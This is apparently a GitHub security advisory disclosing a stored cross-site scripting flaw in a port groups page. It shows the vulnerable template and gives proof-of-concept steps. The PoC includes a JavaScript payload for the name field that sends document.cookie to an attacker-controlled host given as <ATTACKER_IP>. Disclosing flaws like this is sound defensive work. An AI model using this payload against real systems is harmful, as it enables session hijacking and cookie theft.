GHSA-93fx-g747-695x

Summary

/port-groups name Stored Cross-Site Scripting

• HTTP POST
• Request-URI(s): "/port-groups"
• Vulnerable parameter(s): "name"
• Attacker must be authenticated with "admin" privileges.
• When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter.
• After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete.

Details

The vulnerability exists as the name of the port group is not sanitized of HTML/JavaScript-related characters or strings. When the delete button is rendered, the following template is used to render the page:

resources/views/port-group/index.blade.php:

@extends('layouts.librenmsv1')
@section('title', __('Port Groups'))
@section('content')
<div class="container-fluid">
&lt;x-panel id="manage-port-groups-panel">
// [...Truncated...]
@foreach($port_groups as $port_group)
// [...Truncated...]

<button type="button" class="btn btn-danger btn-
sm" title="{{ __('delete Port Group') }}" aria-label="{{ __('Delete') }}"

onclick="delete_pg(this, '{{ $port_group-
>name }}', '{{ route('port-groups.destroy', $port_group->id) }}')"> // using the
port's name in the Delete button functionality without sanitizing for XSS related
characters/strings

As the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored cross-site scripting.

PoC

• Login
• Select Ports > Manage Port Groups
• Select New Port Group
• Input 12345');varpt=newImage();pt.src='http://<ATTACKER_IP>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 into the "Name" input box (change <ATTACKER_IP> to be an the IP of an attacker controlled webserver)
• Select Save
• Select the Delete Icon for the newly created Port Group
• Select OK
• The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled server, leaking the user's cookies.